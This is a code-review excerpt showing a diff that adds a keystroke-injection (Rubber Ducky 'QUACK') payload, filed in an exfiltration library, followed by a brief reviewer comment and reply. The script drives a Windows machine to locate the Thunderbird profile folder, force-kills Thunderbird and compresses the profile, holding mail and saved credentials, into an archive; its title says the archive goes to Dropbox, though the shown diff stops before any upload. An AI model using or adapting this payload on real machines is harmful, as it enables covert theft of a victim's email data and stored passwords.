payloads/library/exfiltration/Save_Your_Thunderbird_Settings/payload.txt

```diff
@@ -0,0 +1,121 @@
+* REM ###############################################################
+* REM #                                                             #
+* REM # Title       : Save Your Thunderbird Settings via Dropbox    #
+* REM # Author      : Aleff                                         #
+* REM # Version     : 1.0                                           #
+* REM # Category    : Exfiltration                                  #
+* REM # Target      : Windows 10/11                                 #
+* REM #                                                             #
+* REM ###############################################################
+
+* REM Opening Thunderbird settings
+QUACK DELAY 1500
+QUACK GUI r
+QUACK STRING thunderbird
+QUACK ENTER
+QUACK DELAY 1000
+QUACK TAB
+QUACK TAB
+QUACK TAB
+QUACK TAB
+QUACK DELAY 500
+QUACK ENTER
+QUACK DELAY 500
+QUACK UPARROW
+QUACK UPARROW
+QUACK DELAY 500
+QUACK ENTER
+QUACK DELAY 500
+QUACK UPARROW
+QUACK UPARROW
+QUACK UPARROW
+QUACK DELAY 500
+QUACK ENTER
+QUACK DELAY 500
+
+* REM Inside the settings
+QUACK TAB
+QUACK TAB
+QUACK TAB
+QUACK TAB
+QUACK TAB
+QUACK TAB
+QUACK TAB
+QUACK TAB
+QUACK TAB
+QUACK TAB
+QUACK TAB
+QUACK DELAY 500
+QUACK ENTER
+QUACK DELAY 500
+
+* REM Inside The Profile Folder
+QUACK TAB
+QUACK TAB
+QUACK TAB
+QUACK TAB
+QUACK DELAY 500
+QUACK ENTER
+QUACK DELAY 500
+QUACK CTRL c
+QUACK DELAY 500
+QUACK ALT F4
+QUACK DELAY 500
+
+* REM Powershell running...
+QUACK GUI r
+QUACK STRING powershell
+QUACK ENTER
+QUACK DELAY 1500
+QUACK STRING cd $env:TEMP
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING Stop-Process -Name "thunderbird" -Force
+QUACK ENTER
+QUACK DELAY 500
+QUACK STRING Compress-Archive -LiteralPath 
+QUACK DELAY 500
+QUACK CTRL v
+QUACK DELAY 500
+* REM Required replace '[2]': Set here the archive name, you must use the same!
+QUACK STRING  -DestinationPath ./[2]
```

Comment:
> You can include variable assignments at the top of the payload to make it easier for user configuration.

I didn't know about this feature, this could come in handy with virtually any payload loaded in the past...